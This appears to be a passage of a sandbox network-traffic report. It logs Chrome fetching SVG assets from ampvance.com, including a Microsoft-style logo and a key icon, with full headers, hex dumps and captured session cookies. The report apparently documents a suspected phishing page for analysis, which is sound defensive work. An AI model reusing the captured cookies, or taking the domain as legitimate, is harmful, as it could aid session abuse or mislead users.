                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=utblvi4yrUJKYpfA2c4awPKTIiK%2FCKIq64w5h4f%2FpMx9NOP272A5DA6MYzxI6FHGxNnSmZIVyNzne2eImbDL5qg2tOiylELbULFaTzzl2MdDlfh%2Fb%2FCLXFeO9uOdkmM%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0f7ad872a7-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC624INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 2c 30 2c 31 2d 34 2e 39 31 38 2d 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36
                                                      Data Ascii: ,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 31 2e 30 32 39 2c 31 2e 30 32 39 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38
                                                      Data Ascii: 1.029,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078
                                                      2024-03-05 13:25:04 UTC296INData Raw: 2c 31 2d 2e 37 33 36 2d 32 2e 33 36 33 5a 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22
                                                      Data Ascii: ,1-.736-2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931"
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.549763104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:04 UTC573OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC741INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 11:00:52 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: HIT
                                                      Age: 8652
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FHXr6rm4wfu6UbWW0t8%2BKuz7OPMI2rgikVcvpDczDJsfb7SWDwJm7cJuwJ37FXF70FKsqUhVo73qcRWS48UgHrZmMMwCY0O3jXkpy3mK08mfdpDrwz8w6XSrzZ5tdlc%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0f6f875e78-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC628INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                      Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                      2024-03-05 13:25:04 UTC971INData Raw: 31 2c 32 38 2e 35 2c 31 33 2e 34 35 33 61 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 31 2c 31 2e 31 30 39 2c 32 2e 36 32 35 41 31 31 2e 36 31 36 2c 31 31 2e 36 31 36 2c 30 2c 30 2c 31 2c 33 30 2c 31 39 61 31 30 2e 30 31 35 2c 31 30 2e 30 31 35 2c 30 2c 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e 39 33 38 2d 32 2e
                                                      Data Ascii: 1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.549765104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:04 UTC599OUTGET /o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC742INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:25:04 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DULsb4UNoN06ngf9sjUFImmBx7cyWFUTy9xTL5lHXDXd%2BbnbefdzwmBEybxz8Gexcv%2BNCb1UeQe%2FecSkBbTwNlai42I8orj2OiOKQwz1eP0Ar1BqdhZ%2F%2Fh1MwIVd0fA%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e10288a8c1b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC627INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 31 2d 34 2e 39 31 38 2d 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c
                                                      Data Ascii: 1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 32 39 2c 31 2e 30 32 39 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35
                                                      Data Ascii: 29,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.5
                                                      2024-03-05 13:25:04 UTC293INData Raw: 2e 37 33 36 2d 32 2e 33 36 33 5a 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65
                                                      Data Ascii: .736-2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" he
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.549766104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:04 UTC599OUTGET /x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC736INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:25:04 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lc3J9ZkFOGizhyRfh6v5xsOag1YfPWf7tlD6u5GSIa7TnDxTFxyVBWf5hvP4PSnIgnTb7e%2BuCI4WELYcVMZ%2FeWCxkdiLPazFDf3wTbGieJMqaPxLmhR2fLi6wRVEWa0%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e107a860f93-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC633INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                      Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                      2024-03-05 13:25:04 UTC1238INData Raw: 39 35 20 31 32 34 39 2e 38 2d 31 30 31 37 2e 36 53 39 35 36 2e 30 34 36 2d 38 31 39 2e 36 20 32 36 35 2e 38 2d 38 31 39 2e 36 2d 39 38 34 2d 33 36 34 2e 30 30 35 2d 39 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34
                                                      Data Ascii: 95 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(14
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.54977135.190.80.14433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:34 UTC535OUTOPTIONS /report/v3?s=t2XtQZ7IrgLo%2B6%2FQ%2FlfV7NC4C7HNPD2jOpTEhnnufHBTudhN0Hsvy4fb8ExsQEQqOX0DCIHvg%2FXAPrQZ2RIqkIOId2e57I4UHShefTBnpBhck9eP%2F49f3%2FOfobYkaLY%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://ampvance.com
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:34 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: OPTIONS, POST
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-type, content-length
                                                      date: Tue, 05 Mar 2024 13:25:34 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.54977235.190.80.14433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:34 UTC531OUTOPTIONS /report/v3?s=Xmr%2BexqgQZuZn%2FurIC87BBzwJ9V5F9jLSZs6qa6uqe2ogtVUeJgOKLzpa1xSbF1k4KlypJ13JvGX2ytffNhC1lSDahGag%2BrXvgqVH2oAOO0L6eA%2Bb9EKs03tibfKPaU%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://ampvance.com
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:34 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: POST, OPTIONS
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-type, content-length
                                                      date: Tue, 05 Mar 2024 13:25:34 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.54977335.190.80.14433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
